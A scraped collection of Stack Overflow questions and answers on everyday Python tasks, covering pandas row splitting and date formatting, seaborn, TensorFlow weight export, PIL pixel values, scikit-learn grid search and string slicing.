[ "python", "pandas", "dataframe" ]
Python Pandas: Split slash separated strings in two or more columns into multiple rows
38,709,423
<p>I have a pandas dataframe that looks like this:</p> <pre><code>SUBJECT STUDENT CITY STATE Math/Chemistry/Biology Sam/Peter/Mary Los Angeles CA Geology/Physics John Boston MA </code></pre> <p>This is how it should look like:</p> <pre><code>SUBJECT STUDENT CITY STATE Math Sam Los Angeles CA Chemistry Peter Los Angeles CA Biology Mary Los Angeles CA Geology John Boston MA Physics John Boston MA </code></pre> <p>Before asking this question, I referred to the solutions mentioned in this page: <a href="http://stackoverflow.com/questions/17116814/pandas-how-do-i-split-text-in-a-column-into-multiple-rows">pandas: How do I split text in a column into multiple rows?</a></p> <p>Since there are slash separated strings in two columns, I am not able to use the solutions in the above link.</p>
2
2016-08-01T23:09:12Z
38,710,301
<p>Try this: Can be modified where <code>SUBJECT</code> equals 1 and <code>zip</code> is then used. </p> <pre><code>df3.SUBJECT = df3.SUBJECT.str.split('/') df3.STUDENT = df3.STUDENT.str.split('/') def splitter(gb): ll = [] subs, stus = gb.SUBJECT.values[0], gb.STUDENT.values[0] if len(stus) == len(subs): ll = zip(subs,stus) elif len(stus) == 1: ll = zip(subs,stus*len(subs)) return pd.DataFrame(ll, columns= (["SUBJECT","STUDENT"])) df = df3.groupby(['CITY','STATE'])['SUBJECT','STUDENT'].apply(splitter).reset_index().drop('level_2', axis =1) print df[[ 'SUBJECT', 'STUDENT', 'CITY','STATE' ]] SUBJECT STUDENT CITY STATE 0 Geology John Boston MA 1 Physics John Boston MA 2 Math Sam LosAngeles CA 3 Chemistry Peter LosAngeles CA 4 Biology Mary LosAngeles CA </code></pre>
1
2016-08-02T01:05:23Z
[ "python", "pandas", "dataframe" ]
Python Pandas: Split slash separated strings in two or more columns into multiple rows
38,709,423
<p>I have a pandas dataframe that looks like this:</p> <pre><code>SUBJECT STUDENT CITY STATE Math/Chemistry/Biology Sam/Peter/Mary Los Angeles CA Geology/Physics John Boston MA </code></pre> <p>This is how it should look like:</p> <pre><code>SUBJECT STUDENT CITY STATE Math Sam Los Angeles CA Chemistry Peter Los Angeles CA Biology Mary Los Angeles CA Geology John Boston MA Physics John Boston MA </code></pre> <p>Before asking this question, I referred to the solutions mentioned in this page: <a href="http://stackoverflow.com/questions/17116814/pandas-how-do-i-split-text-in-a-column-into-multiple-rows">pandas: How do I split text in a column into multiple rows?</a></p> <p>Since there are slash separated strings in two columns, I am not able to use the solutions in the above link.</p>
2
2016-08-01T23:09:12Z
38,713,282
<p>Another solution with <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.concat.html" rel="nofollow"><code>concat</code></a> and <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.join.html" rel="nofollow"><code>join</code></a>:</p> <pre><code>s1 = df.SUBJECT.str.split('/', expand=True).stack() s2 = df.STUDENT.str.split('/', expand=True).stack() print (s1) 0 0 Math 1 Chemistry 2 Biology 1 0 Geology 1 Physics print (s2) 0 0 Sam 1 Peter 2 Mary 1 0 John dtype: object </code></pre> <pre><code>df1 = pd.concat([s1,s2], axis=1, keys=('SUBJECT','STUDENT')) .ffill() .reset_index(level=1, drop=True) print (df1) SUBJECT STUDENT 0 Math Sam 0 Chemistry Peter 0 Biology Mary 1 Geology John 1 Physics John df = df.drop(['SUBJECT','STUDENT'], axis=1) .join(df1) .reset_index(drop=True)[['SUBJECT', 'STUDENT', 'CITY','STATE']] print (df) SUBJECT STUDENT CITY STATE 0 Math Sam Los Angeles CA 1 Chemistry Peter Los Angeles CA 2 Biology Mary Los Angeles CA 3 Geology John Boston MA 4 Physics John Boston MA </code></pre>
2
2016-08-02T06:36:17Z
[ "python", "pandas", "dataframe" ]
checking multiple username and password in pycharm robotframework using for loop
38,709,431
<p>I am trying to check multiple username and password for testing in robotframework using Pycharm. I am using Mac EI Captain. Please help me out. I am trying to use the method given in Robot Framework Guide. Also, Is is possible or not? Or I have to use excel sheet or python file? Please let me knw. This is the piece of code I'm trying:</p> <pre><code> *** Settings *** Library Selenium2Library Resource ../Resources/Common.robot Resource ../Resources/Yahoor.robot Test Setup Common.Begin Browser #Test Teardown Common.End Browser Library string *** Variables *** ${BROWSER} = firefox ${URL} = https://login.yahoo.com/config/login?.src=fpctx&amp;.intl=ca&amp;.lang=en-CA&amp;.done=https://ca.yahoo.com/ ${PASS} = **** *** Test Cases *** Yahoo Login Check Positive Testing [Tags] Positive [Documentation] Check for positive test @{STR} Create List user1 user2 : FOR ${Item} IN @{STR} Yahoor.Verify Display Yahoor.Input Email-id Yahoor.Check Pass Page Yahoor.Input Pass Credentials </code></pre>
1
2016-08-01T23:10:31Z
38,717,068
<p>you can first call and retrieve all users in database and set them in a variable for example BODY and then get the username and passwords from the jsonbody <code>:FOR ${ELEMENT} IN @{BODY.json()}</code> and call your other keywords</p>
0
2016-08-02T09:47:48Z
[ "python", "pycharm", "robotframework" ]
Upgraded Seaborn 0.7.0 to 0.7.1, getting AttribueError for missing axlabel
38,709,439
<p>Having trouble with my upgrade to Seaborn 0.7.1. Conda only has 0.7.0 so I removed it and installed 0.7.1 with pip.</p> <p>I am now getting this error:</p> <p><code>AttributeError: module 'seaborn' has no attribute 'axlabel'</code></p> <p>from this line of code</p> <p><code>sns.axlabel(xlabel="SAMPLE GROUP", ylabel=y_label, fontsize=16)</code></p> <p>I removed and reinstalled 0.7.0 and it fixed the issue. However, in 0.7.1, axlabel appears to still be there and I didn't see anything about changes to it in the release notes. What am I missing? </p>
1
2016-08-01T23:11:28Z
38,718,933
<p>Changes were made in 0.7.1 to clean up the top-level namespace a bit. <code>axlabel</code> was not used anywhere in the documentation, so it was moved to make the main functions more discoverable. You can still access it with <code>sns.utils.axlabel</code>. Sorry for the inconvenience.</p> <p>Note that it's usually just as easy to do <code>ax.set(xlabel="...", ylabel="...")</code>, though it won't get you exactly what you want here because you can't set the size to something different than the default in that line.</p>
1
2016-08-02T11:16:20Z
[ "python", "seaborn" ]
Python_assigning variable using Random function
38,709,441
<p>I am new to python with no prior coding experience. I am using "Python Programming for the absolute beginner" by Mike Dawson to learn this language. One of the assignment is - to simulate a fortune cookie and the program should display one of the five unique fortune at random, each time it's run. </p> <p>I have written the below code, but unable to successfully run the program - </p> <pre><code># Fortune Cookie # Demonstrates random message generation import random print("\t\tFortune Cookie") print("\t\tWelcome user!") # fortune messages m1 = "The earth is a school learn in it." m2 = "Be calm when confronting an emergency crisis." m3 = "You never hesitate to tackle the most difficult problems." m4 = "Hard words break no bones, fine words butter no parsnips." m5 = "Make all you can, save all you can, give all you can." message = random.randrange(m1, m5) print("Your today's fortune " , message ) input("\n\nPress the enter key to exit") </code></pre>
0
2016-08-01T23:11:33Z
38,709,596
<p>Your error is in <code>message = random.randrange(m1, m5)</code>. The method only takes integers as parameters. You should try putting your sentences in a list instead and test the following:</p> <pre><code>import random print("\t\tFortune Cookie") print("\t\tWelcome user!") messages = [ "The earth is a school learn in it.", "Be calm when confronting an emergency crisis.", "You never hesitate to tackle the most difficult problems.", "Hard words break no bones, fine words butter no parsnips.", "Make all you can, save all you can, give all you can." ] print("Your today's fortune ", random.choice(messages)) input("\n\nPress the enter key to exit") </code></pre> <p><code>random.choice</code> will take a random element from the list. You could also generate a random number and call by index, but that's not as clear:</p> <pre><code>index = random.randint(0, len(messages) - 1) print("Your today's fortune ", messages[index]) </code></pre>
0
2016-08-01T23:30:12Z
[ "python" ]
Save or export weights and biases in TensorFlow for non-Python replication
38,709,517
<p>I've built a neural network that performs reasonably well, and I'd like to replicate my model in a non-Python environment. I set up my network as follows:</p> <pre><code>sess = tf.InteractiveSession() x = tf.placeholder(tf.float32, shape=[None, 23]) y_ = tf.placeholder(tf.float32, shape=[None, 2]) W = tf.Variable(tf.zeros([23,2])) b = tf.Variable(tf.zeros([2])) sess.run(tf.initialize_all_variables()) y = tf.nn.softmax(tf.matmul(x,W) + b) </code></pre> <p>How can I obtain a decipherable .csv or .txt of my weights and biases?</p> <p>EDIT: Below is my full script:</p> <pre><code>import csv import numpy import tensorflow as tf data = list(csv.reader(open("/Users/sjayaram/developer/TestApp/out/production/TestApp/data.csv"))) [[float(j) for j in i] for i in data] numpy.random.shuffle(data) results=data #delete results from data data = numpy.delete(data, [23, 24], 1) #delete data from results results = numpy.delete(results, range(23), 1) sess = tf.InteractiveSession() x = tf.placeholder(tf.float32, shape=[None, 23]) y_ = tf.placeholder(tf.float32, shape=[None, 2]) W = tf.Variable(tf.zeros([23,2])) b = tf.Variable(tf.zeros([2])) sess.run(tf.initialize_all_variables()) y = tf.nn.softmax(tf.matmul(x,W) + b) cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1])) train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy) #train the model, saving 80 entries for testing #batch-size: 40 for i in range(0, 3680, 40): train_step.run(feed_dict={x: data[i:i+40], y_: results[i:i+40]}) correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) print(accuracy.eval(feed_dict={x: data[3680:], y_: results[3680:]})) </code></pre>
0
2016-08-01T23:20:49Z
38,709,631
<p>You can fetch the variables as NumPy arrays, and use <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.savetxt.html" rel="nofollow"><code>numpy.savetxt()</code></a> to write out the contents as text or CSV:</p> <pre><code>import numpy as np W_val, b_val = sess.run([W, b]) np.savetxt("W.csv", W_val, delimiter=",") np.savetxt("b.csv", b_val, delimiter=",") </code></pre> <p>Note that this is unlikely to give performance as good as using TensorFlow's native replication mechanisms, in the <a href="https://www.tensorflow.org/versions/r0.10/how_tos/distributed/index.html" rel="nofollow">distributed runtime</a>.</p>
1
2016-08-01T23:34:35Z
[ "python", "machine-learning", "neural-network", "tensorflow" ]
How to Format a Date Column in Pandas?
38,709,558
<p>I have a dataframe <code>df</code> that look like this:</p> <pre><code> ID Date 0 1 2008-01-24 1 2 2007-02-17 </code></pre> <p>The format of <code>Date</code> is <code>%Y-%m-%d</code></p> <p>How can I format the dates to <code>%m-%d-%Y</code> format?</p> <p>I tried using this syntax but it did not give the right format:</p> <pre><code>df["Date"] = df["Date"].strftime("%m-%d-%Y") </code></pre> <p>Any idea how to solve this?</p>
0
2016-08-01T23:24:46Z
38,709,590
<p>Use the <a href="http://pandas.pydata.org/pandas-docs/stable/basics.html#dt-accessor" rel="nofollow"><code>.dt</code></a> accessor:</p> <pre><code>df["Date"] = df["Date"].dt.strftime("%m-%d-%Y") </code></pre>
2
2016-08-01T23:28:37Z
[ "python", "datetime", "pandas", "dataframe", "format" ]
six.b(literal) same as b'literal'? Python 2/3
38,709,567
<p>I have a piece of code, are these two equivalent? I understand that <code>six</code> module is used for making code compatible with both 2 and 3.</p> <pre><code>from six import b os.write(w, b("EMount unsuccessful")) os.write(w, b"EMount unsuccessful") </code></pre>
1
2016-08-01T23:26:15Z
38,709,724
<p>It depends on the python version you are using. In 2.6 or higher, those are equivalent and you can use u instead of u().</p>
2
2016-08-01T23:48:11Z
[ "python" ]
Divide numpy matrix elements in 2-D matrix by sum of all elements in that position of 1-D
38,709,570
<p>If we have a matrix such as:</p> <p>[ [ 2, 3 ] , [ 4, 9 ], [ 3, 1 ] ]</p> <p>I want to know how to be able to divide matrix elements as follows:</p> <p>Sum the elements in the same position of their respective 1-D vectors</p> <p>2 + 4 + 3 = 9</p> <p>3 + 9 + 1 = 13</p> <p>Then divide each of the elements by the sum corresponding to their position</p> <p>Desired output:</p> <p>[ [ .22, .23 ], [ .44, .69 ], [ .33, .08 ] ]</p>
0
2016-08-01T23:26:26Z
38,709,634
<h3>One solution:</h3> <pre><code>import numpy as np data = [[2, 3] , [4, 9], [3, 1]] result = data / np.sum(data, axis=0) print(result) </code></pre> <h3>Output:</h3> <blockquote> <p>[[ 0.22222222 0.23076923] <br> [ 0.44444444 0.69230769] <br> [ 0.33333333 0.07692308]]</p> </blockquote>
2
2016-08-01T23:35:19Z
[ "python", "numpy", "matrix" ]
Returning rows in a dataframe to a list of integers
38,709,595
<p>I have a dataframe with multiple columns and a few 1000 rows with text data. One column contains floats that represent time in ascending order (0, 0.45, 0.87, 1.10 etc). From this I want to build a new dataframe that contains only all the rows where these time values are closest to the integers x = 0,1,2,3......etc</p> <p>Here on Stackoverflow I found an answer to a very similar question, answer posted by DSM. The code is essentially this, modified (hopefully) to give -the- closest number to x, df is my data frame. </p> <pre><code>df.loc[(df.ElapsedTime-x).abs().argsort()[:1]] </code></pre> <p>This seems to essentially do what I need for one x value but I can't figure out how to iterate this over the -entire- data frame to extract -all- rows where the column value is closest to x = 0,1,2,3....in ascending order. This code gives me a data frame, there must be a way to loop this and append the resulting data frames to get the desired result?</p> <p>I have tried this:</p> <pre><code>L=[] for x in np.arange(len(df)): L.append(df.loc[(df.ElapsedTime-x).abs().argsort()[:1]]) L </code></pre> <p>L, in principle has the right rows but it is a messy list and it takes a long time to execute because for loops are not a great way to iterate over a data frame. I'd prefer to get a data frame as the result.</p> <p>I feel I am missing something trivial. </p> <p>Not sure how to post the desired dataframe.</p> <p>Lets say the timevalues are (taken from my dataframe):</p> <pre><code>0.00,0.03,0.58,1.59,1.71,1.96,2.21,2.33,2.46,2.58,2.7,2.83,2.95,3.07 </code></pre> <p>The values grabbed for 0,1,2,3 would be 0, .58, 1.96, 2.95</p> <p>@beroe: if the numbers are 0.8, 1.1, 1.4, 2.8, in this case 1.1 should be grabbed for 1 and 1.4 should be grabbed for 2. If as an example the numbers are 0.5 1.5 2.5. While I think it is unlikely this will happen in my data I think it would be fine to grab 1.5 as 1 and 2.5 as 2. In this application I don't think it is that critical, although I am not sure how I would implement this.</p> <p>Please let me know if anyone needs any additional info.</p>
2
2016-08-01T23:30:04Z
38,709,798
<p>Consider the following <code>pd.Series</code> <code>s</code></p> <pre><code>s = pd.Series(np.arange(5000), np.random.rand(5000) * 100).sort_index() s.head() 0.002587 3007 0.003418 4332 0.060767 2045 0.125182 3179 0.134487 4614 dtype: int64 </code></pre> <p>Get all integers to get closest to with:</p> <pre><code>idx = (s.index // 1).unique() </code></pre> <p>Then reindex with <code>method='nearest'</code></p> <pre><code>s.reindex(idx, method='nearest').head() 0.0 3912 1.0 3617 2.0 2574 3.0 811 4.0 932 dtype: int64 </code></pre>
1
2016-08-01T23:58:40Z
[ "python", "python-3.x", "pandas" ]
Returning rows in a dataframe to a list of integers
38,709,595
<p>I have a dataframe with multiple columns and a few 1000 rows with text data. One column contains floats that represent time in ascending order (0, 0.45, 0.87, 1.10 etc). From this I want to build a new dataframe that contains only all the rows where these time values are closest to the integers x = 0,1,2,3......etc</p> <p>Here on Stackoverflow I found an answer to a very similar question, answer posted by DSM. The code is essentially this, modified (hopefully) to give -the- closest number to x, df is my data frame. </p> <pre><code>df.loc[(df.ElapsedTime-x).abs().argsort()[:1]] </code></pre> <p>This seems to essentially do what I need for one x value but I can't figure out how to iterate this over the -entire- data frame to extract -all- rows where the column value is closest to x = 0,1,2,3....in ascending order. This code gives me a data frame, there must be a way to loop this and append the resulting data frames to get the desired result?</p> <p>I have tried this:</p> <pre><code>L=[] for x in np.arange(len(df)): L.append(df.loc[(df.ElapsedTime-x).abs().argsort()[:1]]) L </code></pre> <p>L, in principle has the right rows but it is a messy list and it takes a long time to execute because for loops are not a great way to iterate over a data frame. I'd prefer to get a data frame as the result.</p> <p>I feel I am missing something trivial. </p> <p>Not sure how to post the desired dataframe.</p> <p>Lets say the timevalues are (taken from my dataframe):</p> <pre><code>0.00,0.03,0.58,1.59,1.71,1.96,2.21,2.33,2.46,2.58,2.7,2.83,2.95,3.07 </code></pre> <p>The values grabbed for 0,1,2,3 would be 0, .58, 1.96, 2.95</p> <p>@beroe: if the numbers are 0.8, 1.1, 1.4, 2.8, in this case 1.1 should be grabbed for 1 and 1.4 should be grabbed for 2. If as an example the numbers are 0.5 1.5 2.5. While I think it is unlikely this will happen in my data I think it would be fine to grab 1.5 as 1 and 2.5 as 2. In this application I don't think it is that critical, although I am not sure how I would implement this.</p> <p>Please let me know if anyone needs any additional info.</p>
2
2016-08-01T23:30:04Z
38,709,881
<p>Don't know how fast this would be, but you could round the times to get "integer" candidates, take the absolute value of the difference to give yourself a way to find the closest, then sort by difference, and then <code>groupby</code> the integer time to return just the rows that are close to integers:</p> <pre><code># setting up my fake data df=pd.DataFrame() df['ElapsedTime']=pd.Series([0.5, 0.8, 1.1, 1.4, 1.8, 2.2, 3.1]) # To use your own data set, set df = Z, and start here... df['bintime'] = df.ElapsedTime.round() df['d'] = abs(df.ElapsedTime - df.bintime) dfindex = df.sort('d').groupby('bintime').first() </code></pre> <p>For the fake time series defined above, the contents of <code>dfindex</code> is:</p> <pre><code> ElapsedTime d bintime 0 0.5 0.5 1 1.1 0.1 2 1.8 0.2 3 3.1 0.1 </code></pre>
1
2016-08-02T00:10:47Z
[ "python", "python-3.x", "pandas" ]
RGB Values Being Returned by PIL don't match RGB color
38,709,618
<p>I'm attempting to make a reasonably simple code that will be able to read the size of an image and return all the RGB values. I'm using PIL on Python 2.7, and my code goes like this:</p> <pre><code>import os, sys from PIL import Image img = Image.open('C:/image.png') pixels = img.load() print(pixels[0, 1]) </code></pre> <p>now this code was actually gotten off of this site as a way to read a gif file. I'm trying to get the code to print out an RGB tuple (in this case (55, 55, 55)) but all it gives me is a small sequence of unrelated numbers, usually containing 34.</p> <p>I have tried many other examples of code, whether from here or not, but it doesn't seem to work. Is it something wrong with the .png format? Do I need to further code in the rgb part? I'm happy for any help.</p>
0
2016-08-01T23:32:25Z
38,709,975
<p>My guess is that your image file is using pre-multiplied alpha values. The <code>8</code> values you see are pretty close to <code>55*34/255</code> (where <code>34</code> is the alpha channel value).</p> <p>PIL uses the mode <code>"RGBa"</code> (with a little <code>a</code>) to indicate when it's using premultiplied alpha. You may be able to tell PIL to covert the to normal <code>"RGBA"</code>, where the pixels will have roughly the values you expect:</p> <pre><code>img = Image.open('C:/image.png').convert("RGBA") </code></pre> <p>Note that if your image isn't supposed to be partly transparent at all, you may have larger issues going on. We can't help you with that without knowing more about your image.</p>
4
2016-08-02T00:21:52Z
[ "python", "python-imaging-library", "rgb" ]
Are there any dangers associated with using kwarg=kwarg in Python functions?
38,709,667
<p>I've sometimes seen code with kwarg=kwarg in one of the functions as shown below:</p> <pre><code>def func1(foo, kwarg): return(foo+kwarg) def func2(bar, kwarg): return(func1(bar*2, kwarg=kwarg)) print(func2(4,5)) </code></pre> <p>I've normally tried to avoid this notation (e.g. by using kwarg1=kwarg2) in order to avoid any possible bugs, but is this actually necessary?</p>
0
2016-08-01T23:40:45Z
38,709,915
<p>There's nothing <em>wrong</em> with it - in this case <code>kwarg</code> is just a variable name - it's not reserved. There may be a bit of confusion with it though, since <code>def func(**kwargs):</code> is the common syntax for creating a dictionary of all the "key word arguments" that are passed into the function. Since you're not doing that here, using such a similar name is unnecessarily confusing. Although it's not clear you're talking about using that exact name, so maybe this is just an issue with the example.</p> <p>But broadly speaking, passing <code>something=something</code> is fairly common practice. You'll see it in lots of places, for example if you're iterating through a color pallette in Matplotlib, you might pass <code>color=color</code> into <code>plot</code>, or if you're building a list of headers in Pandas you might pass <code>coloumns=columns</code> into <code>DataFrame</code>.</p> <p>Bottom line is it should be clear. If it is, it's good. If it's not, it isn't. </p>
2
2016-08-02T00:14:51Z
[ "python", "function", "notation", "keyword-argument" ]
drop hour,min,sec from timestemp?
38,709,670
<p>I want to convert a date from sas, 14487, to 1999-08-31.</p> <p>How can I convert the current results '1999-08-31 00:00:00' to '1999-08-31'? I've tried ser.normalize(). But it doesn't help.</p> <pre><code>ser = pd.to_timedelta(14487, unit='D') + pd.Timestamp('1960-1-1') ser.normalize() </code></pre> <p>yield</p> <pre><code>Timestamp('1999-08-31 00:00:00') </code></pre>
2
2016-08-01T23:40:48Z
38,709,697
<p><code>normalize</code> just resets the time to midnight (according to <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.dt.normalize.html" rel="nofollow">the docs</a>).</p> <p>You can use <code>strftime</code> (see docs <a href="http://pandas.pydata.org/pandas-docs/version/0.17.0/generated/pandas.DatetimeIndex.strftime.html" rel="nofollow">here</a>). Also, <a href="https://docs.python.org/3.5/library/datetime.html#strftime-and-strptime-behavior" rel="nofollow">here</a> is a list of the format specifiers you can use.</p> <pre><code>ser = pd.to_timedelta(14487, unit='D') + pd.Timestamp('1960-1-1') ser.strftime('%Y-%m-%d') </code></pre> <p>outputs</p> <pre><code>'1999-08-31' </code></pre>
3
2016-08-01T23:44:13Z
[ "python", "pandas", "timestamp" ]
drop hour,min,sec from timestemp?
38,709,670
<p>I want to convert a date from sas, 14487, to 1999-08-31.</p> <p>How can I convert the current results '1999-08-31 00:00:00' to '1999-08-31'? I've tried ser.normalize(). But it doesn't help.</p> <pre><code>ser = pd.to_timedelta(14487, unit='D') + pd.Timestamp('1960-1-1') ser.normalize() </code></pre> <p>yield</p> <pre><code>Timestamp('1999-08-31 00:00:00') </code></pre>
2
2016-08-01T23:40:48Z
38,709,746
<p>If you want it in a datetime.date format:</p> <pre><code>(pd.to_timedelta(14487, unit='D') + pd.Timestamp('1960-1-1')).date() #Out: #datetime.date(1999, 8, 31) </code></pre>
3
2016-08-01T23:50:44Z
[ "python", "pandas", "timestamp" ]
Scikit-learn using GridSearchCV on DecisionTreeClassifier
38,709,690
<p>I tried to use GridSearchCV on DecisionTreeClassifier, but get the following error: TypeError: unbound method get_params() must be called with DecisionTreeClassifier instance as first argument (got nothing instead)</p> <p>here's my code: </p> <pre><code>from sklearn.tree import DecisionTreeClassifier, export_graphviz from sklearn.grid_search import GridSearchCV from sklearn.cross_validation import cross_val_score X, Y = createDataSet(filename) tree_para = {'criterion':['gini','entropy'],'max_depth':[4,5,6,7,8,9,10,11,12,15,20,30,40,50,70,90,120,150]} clf = GridSearchCV(DecisionTreeClassifier, tree_para, cv=5) clf.fit(X, Y) </code></pre>
1
2016-08-01T23:43:15Z
38,709,830
<p>In your call to <code>GridSearchCV</code> method, the first argument should be an instantiated object of the <code>DecisionTreeClassifier</code> instead of the name of the class. It should be</p> <pre><code>clf = GridSearchCV(DecisionTreeClassifier(), tree_para, cv=5) </code></pre> <p>Check out the example <a href="http://scikit-learn.org/stable/modules/generated/sklearn.grid_search.GridSearchCV.html" rel="nofollow">here</a> for more details.</p> <p>Hope that helps!</p>
1
2016-08-02T00:02:39Z
[ "python", "machine-learning", "scikit-learn" ]
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] </code></pre> <p>The goal is to remove within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be ommited in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches): new_s = '' lbound = 0 for l, h in matches: news += sentence[lbound:l] lbound = h new_s += sentence[matches[-1][1]:] return new_s </code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap, you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten: 1000000 loops, best of 3: 1.34 µs per loop Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop Prune: 100000 loops, best of 3: 2.05 µs per loop njzk2: 100000 loops, best of 3: 3.19 µs per loop </code></pre>
1
2016-08-01T23:45:50Z
38,709,808
<pre><code>shorthend =sentence[:matches[0][0]]+ "".join([sentence[matches[i-1][1]:matches[0][0] for i in range(1, len(matches)]) + sentence[matches[len(matches)]:] </code></pre> <p>Since I' on my phone right now, I cannot debug but it should work :D</p>
0
2016-08-01T23:59:39Z
[ "python", "optimization" ]
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] </code></pre> <p>The goal is to remove within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be ommited in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches): new_s = '' lbound = 0 for l, h in matches: news += sentence[lbound:l] lbound = h new_s += sentence[matches[-1][1]:] return new_s </code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap, you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten: 1000000 loops, best of 3: 1.34 µs per loop Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop Prune: 100000 loops, best of 3: 2.05 µs per loop njzk2: 100000 loops, best of 3: 3.19 µs per loop </code></pre>
1
2016-08-01T23:45:50Z
38,709,820
<p>If you append (null, 0) to the front and (-1, null) to the back of matches</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(null, 0), (5, 10), (13, 18), (22, 27), (38, 42), (len(sentence), null)] </code></pre> <p>you can then write a join expression based on</p> <pre><code>matches[i][1]:matches[i+1][0] for i in range(len(matches)-1) </code></pre> <p>Is that enough of a hint to move you along?</p>
0
2016-08-02T00:00:42Z
[ "python", "optimization" ]
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] </code></pre> <p>The goal is to remove within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be ommited in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches): new_s = '' lbound = 0 for l, h in matches: news += sentence[lbound:l] lbound = h new_s += sentence[matches[-1][1]:] return new_s </code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap, you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten: 1000000 loops, best of 3: 1.34 µs per loop Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop Prune: 100000 loops, best of 3: 2.05 µs per loop njzk2: 100000 loops, best of 3: 3.19 µs per loop </code></pre>
1
2016-08-01T23:45:50Z
38,710,164
<p>This might be faster. It's basically your solution but with list instead of strings. Since lists are mutable and doesn't need to be created every loop, it should be faster by quite much (maybe not for such few matches though).</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] def remove_matches(sentence, matches): result = [] i = 0 for x, y in matches: result.append(sentence[i:x]) i = y result.append(sentence[i:]) return "".join(result) </code></pre> <p>This method might be quicker otherwise:</p> <pre><code>def remove_matches(sentence, matches): return "".join( [sentence[0:matches[i][0]] if i == 0 else sentence[matches[i - 1][1]:matches[i][0]] if i != len(matches) else sentence[matches[i - 1][1]::] for i in range(len(matches) + 1) ]) </code></pre>
1
2016-08-02T00:45:26Z
[ "python", "optimization" ]
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] </code></pre> <p>The goal is to remove within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be ommited in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches): new_s = '' lbound = 0 for l, h in matches: news += sentence[lbound:l] lbound = h new_s += sentence[matches[-1][1]:] return new_s </code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap, you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten: 1000000 loops, best of 3: 1.34 µs per loop Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop Prune: 100000 loops, best of 3: 2.05 µs per loop njzk2: 100000 loops, best of 3: 3.19 µs per loop </code></pre>
1
2016-08-01T23:45:50Z
38,717,333
<p>Had the strings be mutable, a fast solution would have been possible by moving the characters in-place, by contiguous substrings.</p> <p>An optimal C solution would consist of a few memmov calls.</p>
0
2016-08-02T09:59:33Z
[ "python", "optimization" ]
Remove characters in ranges from a string
38,709,711
